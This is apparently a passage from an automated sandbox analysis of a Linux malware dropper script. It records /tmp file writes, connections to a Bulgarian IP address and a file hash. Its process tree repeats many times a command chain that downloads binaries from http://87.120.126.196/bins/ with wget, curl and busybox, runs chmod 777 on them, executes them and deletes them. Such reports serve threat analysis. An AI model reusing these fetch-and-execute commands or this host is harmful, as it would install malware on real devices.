N/A N/A /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /usr/bin/curl N/A
File opened for modification /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /usr/bin/curl N/A
File opened for modification /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /usr/bin/curl N/A
File opened for modification /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /usr/bin/curl N/A
File opened for modification /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ /usr/bin/curl N/A
File opened for modification /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /usr/bin/curl N/A
File opened for modification /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /usr/bin/curl N/A
File opened for modification /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /usr/bin/curl N/A
File opened for modification /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /usr/bin/curl N/A
File opened for modification /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /usr/bin/curl N/A
File opened for modification /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /usr/bin/curl N/A
File opened for modification /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /usr/bin/curl N/A
File opened for modification /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /usr/bin/curl N/A
File opened for modification /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /usr/bin/curl N/A
File opened for modification /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw /usr/bin/curl N/A
File opened for modification /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /usr/bin/curl N/A
File opened for modification /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /usr/bin/curl N/A
File opened for modification /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /usr/bin/curl N/A
File opened for modification /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /usr/bin/curl N/A
File opened for modification /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /usr/bin/curl N/A
File opened for modification /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q /usr/bin/curl N/A
File opened for modification /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /usr/bin/curl N/A
File opened for modification /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /usr/bin/curl N/A
File opened for modification /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /usr/bin/curl N/A
File opened for modification /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /usr/bin/curl N/A

Processes

/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh

[/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/chmod

[chmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt

[./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/rm

[rm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/usr/bin/wget

[wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/bin/chmod

[chmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw

[./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/bin/rm

[rm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/usr/bin/wget

[wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/bin/chmod

[chmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ

[./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/bin/rm

[rm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/bin/chmod

[chmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q

[./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/bin/rm

[rm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/usr/bin/wget

[wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/chmod

[chmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG

[./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/rm

[rm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/usr/bin/wget

[wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/chmod

[chmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK

[./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/rm

[rm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/usr/bin/wget

[wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/chmod

[chmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW

[./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/rm

[rm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/usr/bin/wget

[wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/chmod

[chmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq

[./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/rm

[rm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/usr/bin/wget

[wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/chmod

[chmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh

[./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/rm

[rm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/chmod

[chmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4

[./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/rm

[rm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/usr/bin/wget

[wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/chmod

[chmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P

[./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/rm

[rm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/usr/bin/wget

[wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/chmod

[chmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT

[./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/rm

[rm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/usr/bin/wget

[wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/chmod

[chmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR

[./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/rm

[rm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/usr/bin/wget

[wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/chmod

[chmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t

[./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/rm

[rm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/usr/bin/wget

[wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/chmod

[chmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW

[./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/rm

[rm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/usr/bin/wget

[wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/chmod

[chmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq

[./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/rm

[rm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/usr/bin/wget

[wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/chmod

[chmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh

[./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/rm

[rm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/chmod

[chmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4

[./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/rm

[rm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/usr/bin/wget

[wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/chmod

[chmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P

[./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/rm

[rm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/usr/bin/wget

[wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/chmod

[chmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT

[./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/rm

[rm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/usr/bin/wget

[wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/chmod

[chmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR

[./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/rm

[rm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/usr/bin/wget

[wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/chmod

[chmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t

[./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/rm

[rm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/usr/bin/wget

[wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/chmod

[chmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG

[./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/rm

[rm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/usr/bin/wget

[wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/chmod

[chmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK

[./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/rm

[rm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/usr/bin/wget

[wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/chmod

[chmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt

[./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/rm

[rm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/usr/bin/wget

[wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/858-1-0xb674e000-0xb675f044-memory.dmp

memory/884-2-0xb6795000-0xb67a6044-memory.dmp

memory/884-3-0xb6759000-0xb676a044-memory.dmp

memory/896-4-0xb674c000-0xb675d044-memory.dmp